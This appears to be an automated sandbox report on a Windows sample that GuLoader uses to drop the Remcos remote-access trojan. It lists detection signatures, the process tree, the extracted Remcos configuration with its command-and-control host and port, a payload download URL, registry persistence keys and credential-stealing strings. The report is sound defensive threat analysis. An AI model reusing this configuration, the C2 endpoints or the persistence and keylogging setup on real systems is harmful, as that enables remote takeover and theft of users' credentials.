Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote Qu11262024.scr.exe

Overview

General Information

Sample name:Quote Qu11262024.scr.exe
Analysis ID:1566631
MD5:a75036f188683604d03dd8f03fee6ec3
SHA1:cc2c07398c85ffcd033223d01155851647d0ee68
SHA256:4c1df01c44c5a69f9efa30528117c3d90f2df8a78c23a7ccc25412da15793531
Tags:exeuser-adrian__luca
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Quote Qu11262024.scr.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" MD5: A75036F188683604D03DD8F03FEE6EC3)
    • Quote Qu11262024.scr.exe (PID: 5712 cmdline: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" MD5: A75036F188683604D03DD8F03FEE6EC3)
      • Quote Qu11262024.scr.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\qjya" MD5: A75036F188683604D03DD8F03FEE6EC3)
      • Quote Qu11262024.scr.exe (PID: 3776 cmdline: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\addkeox" MD5: A75036F188683604D03DD8F03FEE6EC3)
      • Quote Qu11262024.scr.exe (PID: 4552 cmdline: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\dfjdeyijjf" MD5: A75036F188683604D03DD8F03FEE6EC3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["myfreeenedd.ru:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E5Y2QK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2587088488.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000003.00000003.2612294134.0000000005D77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000003.2606934704.0000000005D77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000003.00000003.2605511155.0000000005D77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 8 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Quote Qu11262024.scr.exe, ProcessId: 5712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Quote Qu11262024.scr.exe, ProcessId: 5712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Quote Qu11262024.scr.exe, ProcessId: 5712, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Quote Qu11262024.scr.exe, ProcessId: 5712, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scr

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Quote Qu11262024.scr.exe, ProcessId: 5712, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T14:43:19.623266+010020365941Malware Command and Control Activity Detected192.168.2.64978566.63.187.2462404TCP
              2024-12-02T14:43:22.420136+010020365941Malware Command and Control Activity Detected192.168.2.64979266.63.187.2462404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T14:43:22.285540+010028033043Unknown Traffic192.168.2.649793178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T14:43:14.989854+010028032702Potentially Bad Traffic192.168.2.649769164.160.91.32443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: myfreeenedd.ruAvira URL Cloud: Label: malware
              Source: 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["myfreeenedd.ru:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E5Y2QK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scrReversingLabs: Detection: 52%
              Source: Quote Qu11262024.scr.exeReversingLabs: Detection: 52%
              Source: Yara matchFile source: 00000003.00000003.2587088488.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2612294134.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2606934704.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2605511155.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2609800552.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4604168918.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote Qu11262024.scr.exe PID: 5712, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,6_2_00404423
              Source: Quote Qu11262024.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: Quote Qu11262024.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_0040589C CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_004063D7 FindFirstFileA,FindClose,0_2_004063D7
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_004063D7 FindFirstFileA,FindClose,3_2_004063D7
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_004026FE FindFirstFileA,3_2_004026FE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_0040589C CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_0040589C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_371410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_371410F1
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37146580 FindFirstFileExA,3_2_37146580
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407898

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49785 -> 66.63.187.246:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49792 -> 66.63.187.246:2404
              Source: Malware configuration extractorURLs: myfreeenedd.ru
              Source: global trafficTCP traffic: 192.168.2.6:49785 -> 66.63.187.246:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49793 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49769 -> 164.160.91.32:443
              Source: global trafficHTTP traffic detected: GET /GKSZQPVYFBHuSxeCc116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /GKSZQPVYFBHuSxeCc116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635581411.0000000037110000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Quote Qu11262024.scr.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Quote Qu11262024.scr.exe, 00000006.00000002.2630919694.00000000022C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Quote Qu11262024.scr.exe, 00000006.00000002.2630919694.00000000022C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635408244.0000000037020000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635408244.0000000037020000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.healthselflesssupplies.co.za
              Source: global trafficDNS traffic detected: DNS query: myfreeenedd.ru
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv953.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv953.tmp.6.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2587127492.0000000005D6F000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D64000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, bhv953.tmp.6.drString found in binary or memory: http://geoplugin.net/json.gp
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2587127492.0000000005D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpd
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: Quote Qu11262024.scr.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Quote Qu11262024.scr.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv953.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv953.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv953.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000003.2620697668.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000003.2621200234.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635581411.0000000037110000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Quote Qu11262024.scr.exe, 00000008.00000003.2620697668.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000003.2621200234.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635581411.0000000037110000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: Quote Qu11262024.scr.exe, 00000006.00000002.2630407317.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv953.tmp.6.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
              Source: bhv953.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv953.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv953.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv953.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv953.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv953.tmp.6.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv953.tmp.6.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: bhv953.tmp.6.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv953.tmp.6.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv953.tmp.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv953.tmp.6.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv953.tmp.6.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv953.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv953.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv953.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: Quote Qu11262024.scr.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv953.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv953.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
